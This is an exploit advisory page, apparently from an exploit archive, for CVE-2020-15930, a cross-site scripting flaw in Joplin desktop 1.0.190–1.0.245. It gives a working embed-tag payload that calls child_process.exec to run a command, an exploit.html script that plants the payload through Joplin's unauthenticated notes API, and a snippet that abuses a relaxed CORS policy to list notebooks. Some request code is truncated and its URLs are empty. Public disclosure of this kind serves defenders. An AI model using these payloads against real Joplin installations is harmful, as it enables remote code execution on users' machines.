Joplin 1.0.245 Cross Site Scripting / Code Execution

Joplin version 1.0.245 suffers from a cross site scripting vulnerability that can lead to allowing for remote code execution.

MD5 | 00da71016d73cb06ead4d170f5e72d1c

# Exploit Title: Joplin 1.0.245 - Arbitrary Code Execution (PoC)
# Date: 2020-09-21
# Exploit Author: Ademar Nowasky Junior (@nowaskyjr)
# Vendor Homepage:
# Software Link:
# Version: 1.0.190 to 1.0.245
# Tested on: Windows / Linux
# CVE : CVE-2020-15930
# References:

# 1. Technical Details
# An XSS issue in Joplin for desktop v1.0.190 to v1.0.245 allows arbitrary code execution via a malicious HTML embed tag.
# HTML embed tags are not blacklisted in Joplin's renderer. This can be chained with a bug where child windows opened through have node integration enabled to achieve ACE.
# If Joplin API is enabled, Remote Code Execution with user interaction is possible by abusing the lack of required authentication in Joplin 'POST /notes' api endpoint to remotely deploy the payload into the victim application.

# 2. PoC
# Paste the following payload into a note:

<embed src="data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)</script>">

# 2.1 RCE with user interaction
# Enable Joplin API, visit exploit.html and open the created note in Joplin to execute the exploit.
# By default, notes are stored in the last notebook created.

<!-- exploit.html -->
x = new XMLHttpRequest;
j = {
title: "CVE-2020-15930",
body: "<embed src='data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)<\/script>'>"
};"POST", "");

# To create a note in other notebooks you need the notebook ID. It's possible to get the victim's notebooks IDs due to a relaxed CORS policy in 'GET /folders' endpoint.

<!-- notebooks.html -->
x = new XMLHttpRequest();
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
}'GET', '');

Related Posts